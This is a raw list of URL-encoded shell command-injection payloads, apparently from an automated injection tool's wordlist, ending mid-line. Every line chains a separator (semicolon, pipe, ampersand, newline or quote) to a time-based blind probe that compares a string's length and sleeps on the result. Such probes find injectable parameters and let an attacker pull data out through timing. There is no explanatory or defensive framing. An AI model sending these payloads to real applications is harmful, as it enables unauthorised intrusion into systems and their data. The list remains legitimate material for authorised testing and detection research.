sleep%201%20%252F%252F\n%7C%20%5B%206%20-ne%20%24%28echo%20NMWJXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%207%20-ne%20%24%28echo%20NMWJXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%208%20-ne%20%24%28echo%20NMWJXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%209%20-ne%20%24%28echo%20NMWJXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%0A%20str%3D%24%28echo%20EIGKOY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20EIGKOY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20EIGKOY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20EIGKOY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20EIGKOY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20EIGKOY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20EIGKOY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20EIGKOY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20EIGKOY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20IBOOVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20IBOOVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20IBOOVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20IBOOVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20IBOOVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20IBOOVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20IBOOVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20IBOOVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20IBOOVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%7C%20%5B%201%20-ne%20%24%28echo%20KXLYID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%202%20-ne%20%24%28echo%20KXLYID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%203%20-ne%20%24%28echo%20KXLYID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%204%20-ne%20%24%28echo%20KXLYID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%205%20-ne%20%24%28echo%20KXLYID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%206%20-ne%20%24%28echo%20KXLYID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%207%20-ne%20%24%28echo%20KXLYID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%208%20-ne%20%24%28echo%20KXLYID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%7C%20%5B%209%20-ne%20%24%28echo%20KXLYID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UIVPGT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%0A%20str%3D%24%28echo%20RPJJIB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20RPJJIB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20RPJJIB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20RPJJIB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20RPJJIB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20RPJJIB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20RPJJIB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20RPJJIB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%0A%20str%3D%24%28echo%20RPJJIB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%3B%20str%3D%24%28echo%20MYWJNW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20MYWJNW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20MYWJNW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20MYWJNW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20MYWJNW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20MYWJNW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20MYWJNW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20MYWJNW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%3B%20str%3D%24%28echo%20MYWJNW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%7C%20%5B%201%20-ne%20%24%28echo%20MGKXID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%202%20-ne%20%24%28echo%20MGKXID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%203%20-ne%20%24%28echo%20MGKXID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%204%20-ne%20%24%28echo%20MGKXID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%205%20-ne%20%24%28echo%20MGKXID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%206%20-ne%20%24%28echo%20MGKXID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%207%20-ne%20%24%28echo%20MGKXID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%208%20-ne%20%24%28echo%20MGKXID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%7C%20%5B%209%20-ne%20%24%28echo%20MGKXID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MISRQQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MISRQQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MISRQQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MISRQQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MISRQQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MISRQQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MISRQQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MISRQQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MISRQQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%0A%20str%3D%24%28echo%20FNSLEC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20FNSLEC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20FNSLEC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20FNSLEC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20FNSLEC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20FNSLEC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20FNSLEC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20FNSLEC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20FNSLEC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2527%3B%20str%3D%24%28echo%20ZEPYMS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2527%3B%20str%3D%24%28echo%20ZEPYMS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2527%3B%20str%3D%24%28echo%20ZEPYMS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2527%3B%20str%3D%24%28echo%20ZEPYMS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2527%3B%20str%3D%24%28echo%20ZEPYMS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2527%3B%20str%3D%24%28echo%20ZEPYMS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2527%3B%20str%3D%24%28echo%20ZEPYMS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2527%3B%20str%3D%24%28echo%20ZEPYMS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2527%3B%20str%3D%24%28echo%20ZEPYMS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2527%0A%20str%3D%24%28echo%20BNZVGD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2527%0A%20str%3D%24%28echo%20BNZVGD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2527%0A%20str%3D%24%28echo%20BNZVGD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2527%0A%20str%3D%24%28echo%20BNZVGD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2527%0A%20str%3D%24%28echo%20BNZVGD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2527%0A%20str%3D%24%28echo%20BNZVGD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2527%0A%20str%3D%24%28echo%20BNZVGD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2527%0A%20str%3D%24%28echo%20BNZVGD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2527%0A%20str%3D%24%28echo%20BNZVGD%29%0A%20str1%3D